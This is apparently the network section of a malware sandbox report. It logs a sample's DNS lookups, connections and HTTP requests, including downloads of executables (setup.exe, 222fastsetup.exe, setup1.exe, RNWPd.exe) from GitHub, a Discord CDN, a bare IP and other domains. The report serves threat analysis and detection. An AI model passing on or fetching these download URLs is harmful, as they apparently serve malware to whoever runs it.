Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
yip.su | 172.67.169.89 | |
cacerts.digicert.com |
CNAME
fp2e7a.wpc.phicdn.net
|
152.195.38.76 |
pastebin.com | 104.20.4.235 | |
raw.githubusercontent.com | 185.199.111.133 | |
58yongzhe.com | 178.22.31.113 | |
github.com | 20.200.245.247 | |
cdn.discordapp.com | 162.159.134.233 |
- TCP Requests
-
-
192.168.56.103:49165 104.20.3.235:443pastebin.com
-
192.168.56.103:49172 152.195.38.76:80cacerts.digicert.com
-
192.168.56.103:49170 162.159.133.233:443cdn.discordapp.com
-
192.168.56.103:49168 172.67.169.89:443yip.su
-
192.168.56.103:49169 178.22.31.113:8058yongzhe.com
-
192.168.56.103:49171 185.199.111.133:443raw.githubusercontent.com
-
192.168.56.103:49166 194.58.114.223:80
-
192.168.56.103:49167 20.200.245.247:443github.com
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64178 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
GET
200
https://pastebin.com/raw/xYhKBupz
REQUEST
RESPONSE
BODY
GET /raw/xYhKBupz HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 01:00:40 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 12 Aug 2024 01:00:40 GMT
Server: cloudflare
CF-RAY: 8b1c87a01b4729df-FUK
GET
302
https://github.com/evan9908/Setup/raw/main/222fastsetup.exe
REQUEST
RESPONSE
BODY
GET /evan9908/Setup/raw/main/222fastsetup.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: GitHub.com
Date: Mon, 12 Aug 2024 01:00:41 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/evan9908/Setup/main/222fastsetup.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C00F:0A4D:D45B4E:FA3635:66B95EB8
GET
200
https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099&
REQUEST
RESPONSE
BODY
GET /attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 01:00:41 GMT
Content-Type: application/x-msdos-program
Content-Length: 7591656
Connection: keep-alive
CF-Ray: 8b1c87a54da330cd-ICN
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 59099
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "5dc97eacc5086f917367b3e29d0e459e"
Expires: Tue, 12 Aug 2025 01:00:41 GMT
Last-Modified: Sun, 11 Aug 2024 08:34:22 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1723365262757529
x-goog-hash: crc32c=QVPp8A==
x-goog-hash: md5=Xcl+rMUIb5FzZ7PinQ5Fng==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7591656
x-guploader-uploadid: AHxI1nNaBgK_hGS9kZsercx1M4PqBi5muK8JQkKNUzVjQgCyor_s0gfDWtbplNwlSqmOMW9gS_Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=qhhid41gWvLfHvc49KKztvYQjLFXtg4CXhghYFWRCCo-1723424441-1.0.1.1-xxcPrPNhGe9WxzyBIDQ9ik.zuh5H7UlXPkyXVuXdCg5QMvhKWGl.9VOwvVO0kaBHQ1dHUmKC.hHJxilN7oCrCg; path=/; expires=Mon, 12-Aug-24 01:30:41 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlk552ktKUuZk3J7%2BkoMrI0vTdl9YIwR%2Bcpfn18A4m5v4RSXq4wHtPxR37vrePyBmCSD83MQ5L8yOGUdzAGkoBoSfnLNuAMFDM1OYEpSIn3n5CJC7rVGVPzwc0Ek0naKfHMUcw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=hPlq.9Y.KbNNbJR6Jq1yxhQJH3jJEAJDd2zjLRj8X38-1723424441193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
GET
403
https://yip.su/RNWPd.exe
REQUEST
RESPONSE
BODY
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 12 Aug 2024 01:00:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 976HLdL4JcUo/Xdj93NgXo693RZZrv1n/+pj/yjvZlosi8Y9tsAX6c+NzDQv2BcZEJFWlV9TYZwENdvjcDeUBQGe5HjJ9g949NjwcEyC6sw=$Hajvo4FqWkUhnC5UbxWFzQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRP45t11kHkSqXDNr7B3WznNyLJm%2BanZDd9%2Bl2TvDu9e6VPY%2F8SGSfWB0y8a%2Fw%2BvHlfiHvEPehgBhZhb7F0tCTxWTLirfZrxkuda8DysFJoathLphcSjAnM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b1c87a84f822eed-LAX
alt-svc: h3=":443"; ma=86400
GET
302
http://194.58.114.223/d/385121
REQUEST
RESPONSE
BODY
GET /d/385121 HTTP/1.1
Host: 194.58.114.223
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 12 Aug 2024 01:00:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099&
GET
200
http://58yongzhe.com/parts/setup1.exe
REQUEST
RESPONSE
BODY
GET /parts/setup1.exe HTTP/1.1
Host: 58yongzhe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 01:00:41 GMT
Server: nginx/1.26.1
Content-Type: application/x-dosexec
Content-Length: 419328
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET
200
http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
REQUEST
RESPONSE
BODY
GET /DigiCertGlobalRootG2.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: cacerts.digicert.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 8563
cache-control: max-age=172800, public
Content-Type: application/pkix-cert
Date: Mon, 12 Aug 2024 01:00:41 GMT
Etag: "5a286417-392"
expires: Wed, 14 Aug 2024 01:00:41 GMT
last-modified: Wed, 06 Dec 2017 21:41:43 GMT
Server: ECAcc (tkc/BECE)
X-Cache: HIT
Content-Length: 914
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 172.67.169.89:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49170 162.159.133.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
TLS 1.2 192.168.56.103:49165 104.20.3.235:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | 82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f |
TLS 1.2 192.168.56.103:49167 20.200.245.247:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA | CN=github.com | e7:03:5b:cc:1c:18:77:1f:79:2f:90:86:6b:6c:1d:f8:df:aa:bd:c0 |
TLS 1.2 192.168.56.103:49171 185.199.111.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28 |
Snort Alerts
No Snort Alerts